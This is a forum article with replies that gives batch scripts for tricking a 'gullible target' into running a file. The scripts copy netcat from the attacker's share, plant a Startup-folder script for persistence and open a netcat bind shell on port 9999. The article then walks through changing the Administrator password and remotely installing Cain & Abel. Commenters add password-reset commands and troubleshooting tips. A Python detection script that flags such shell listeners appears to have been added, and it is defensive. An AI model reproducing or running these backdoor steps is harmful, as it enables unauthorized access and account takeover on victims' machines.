Hacking a Network Computer

SpOonWiZaRd's Avatar author of Hacking a Network Computer
This is an article on Hacking a Network Computer in Ethical hacking Tips.
I wrote this because it really worked for me a few times and I hope it does for you too; all you need is a very gullible target.

As we all know, a Trojan is very likely to be picked up by AV. What you need is Netcat: netcat opens a port on a computer for access (if used correctly from a batch file, you open a port on a target computer). You will need to write a batch file. The batch file that copies netcat to the remote computer has to be run from the target computer (the person on the target will have to execute the batch file in some way). Open Notepad and type this in:
Code:
@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad.

The next batch file makes sure the port you specified opens every time Windows starts up; you can specify any port you wish. Open Notepad and type:
Code:
@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad; this is the file that the previous batch file copies into the Startup folder. You can bind the batch file to another file and share that file, and let the target execute it so that it copies netcat and the other batch file onto his/her computer, thus opening port 9999. After port 9999 has been opened, you can telnet to that port on the target computer and have full access without needing any passwords of any sort. After you are in, change the Administrator password in case something happens to your files; the command is this:

net user Administrator newpassword

Now from here you can do what you want, e.g. try shutting down the target computer by browsing to his system32 folder and typing in:

shutdown -r -t 10 -c "Hello"

The computer will then restart in 10 seconds' time. You can even play around more by installing Cain & Abel on your computer and then installing Abel remotely on his computer (since you know the Administrator password). Once you have Abel on the target you can start and stop services and do more!

Enjoy.
0
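Seen from the defending side, the command line in the article is itself the detection signal: a process that listens on a port and hands cmd.exe to whoever connects, relaunched from the All Users Startup folder. The sketch below is an added example, not part of the original article; the event field names and the sample events are constructed, and it matches on arguments rather than the binary name so a renamed netcat.exe is still caught.

```python
import shlex

SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe"}
STARTUP_MARKER = "\\start menu\\programs\\startup\\"

def parse_listener(cmdline):
    """Return (port, program) when cmdline listens and hands a shell to the
    peer, else None. Flag clusters such as -lvp are handled."""
    try:
        args = shlex.split(cmdline, posix=False)[1:]
    except ValueError:          # unbalanced quotes: not parseable, no verdict
        return None
    listening, port, program = False, None, None
    for tok, nxt in zip(args, args[1:] + [None]):
        if not tok.startswith("-"):
            continue
        flags = tok[1:]
        listening = listening or "l" in flags.lower()   # -l or -L
        if flags.endswith("p") and nxt and nxt.isdigit():
            port = int(nxt)
        if flags.endswith("e") and nxt:
            program = nxt.strip('"')
    # A bare listener is not flagged; one that executes a shell is.
    if listening and program and program.split("\\")[-1].lower() in SHELLS:
        return port, program
    return None

def triage(events):
    """events: dicts with 'image', 'cmdline', 'parent_cmdline' (assumed schema)."""
    findings = []
    for ev in events:
        hit = parse_listener(ev["cmdline"])
        if not hit:
            continue
        findings.append(("shell-listener", ev["image"], hit[0]))
        # Listener launched by a script in a Startup folder: persistence.
        if STARTUP_MARKER in ev.get("parent_cmdline", "").lower():
            findings.append(("startup-persistence", ev["parent_cmdline"], hit[0]))
    return findings

# Constructed sample events, not taken from any real host.
SAMPLE = [
    {"image": r"C:\netcat.exe", "cmdline": "netcat.exe -L -p 9999 -d -e cmd.exe",
     "parent_cmdline": r'cmd /c "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Startup.bat"'},
    {"image": r"C:\Temp\svc.exe", "cmdline": r'"C:\Temp\svc.exe" -lvp 4444 -e C:\Windows\System32\cmd.exe',
     "parent_cmdline": "explorer.exe"},
    {"image": r"C:\tools\nc.exe", "cmdline": "nc.exe -l -p 8080", "parent_cmdline": "cmd.exe"},
    {"image": r"C:\Windows\System32\ping.exe", "cmdline": "ping -l 1400 -n 1 10.0.0.1", "parent_cmdline": "cmd.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

The same argument pattern can be applied to the text of any .bat file found in a Startup folder, one line at a time, to catch the persistence script before it runs.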
hanleyhansen's Avatar, Join Date: Jan 2008
Pro contributor
Great article! Is it possible to use Netcat to open a port in a local computer when you have limited rights? I would like to open port 3389 that way I can RDC.
0
XXxxImmortalxxXX's Avatar
Invasive contributor
Well, if the user's password isn't administrator, type this

Net user

it will display a list of user accounts

once found type in this

net user username newpassword so for example

net user blahh 123456

his new password is 123456

and voilà

Nice article, by the way
0
arun_yadav96's Avatar, Join Date: Oct 2008
Newbie Member
Very Nice
0
sundeep.kumar's Avatar, Join Date: Dec 2007
Go4Expert Member
What to do if we get the error message "Access is Denied" - further it says somewhere around 5 errors occurred .....
0
me.unknowwn's Avatar, Join Date: Nov 2008
Newbie Member
I read somewhere that the IP address is being changed regularly by the ISP. I too keep on checking my IP address at regular intervals and found this information to be true, although the part of the IP address remains unchanged.

Here in this case, how can one be sure that writing one's own IP address in the batch file will always point to our computer?

What I noticed is at around 5pm I connected to the net with IP address (AAA.BBB.CC.DDD)

I disconnected the net and reconnected immediately and the IP address was now (AAA.BBB.XX.YYY)

Please clarify my point. Does this change in IP made by the ISP each time we log in on the net matter or not in determining our own or the target machine's IP address?

(Please don't mind. I am still in learning phase.)
0
NDL's Avatar, Join Date: Oct 2008
NDL
Contributor
Quote:
Originally Posted by XXxxImmortalxxXX
Well, if the user's password isn't administrator, type this

Net user

it will display a list of user accounts

once found type in this

net user username newpassword so for example

net user blahh 123456

his new password is 123456

and voilà

Nice article, by the way
This only works if we are in an admin account!!!
0
NDL's Avatar, Join Date: Oct 2008
NDL
Contributor
Quote:
Originally Posted by sundeep.kumar
What to do if we get the error message "Access is Denied" - further it says somewhere around 5 errors occurred .....
Because you must be trying to access through a limited account.
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Vote for this article for Article of the month - October 2008
0
Bhullarz's Avatar
Skilled contributor
If we are trying to open a port and, through that, we are trying to access the machine using TELNET or any other program, even Windows XP's built-in firewall alerts the user to keep the port blocked or unblocked, whether you are using an ADMIN account or not. Then there is no fun in executing the batch at the remote location.

Moreover, when I tried to run the command "netcat", it didn't work, as the message was that it is not an internal / external command. I am using Windows XP Service Pack 3.

Last edited by Bhullarz; 18Nov2008 at 05:07..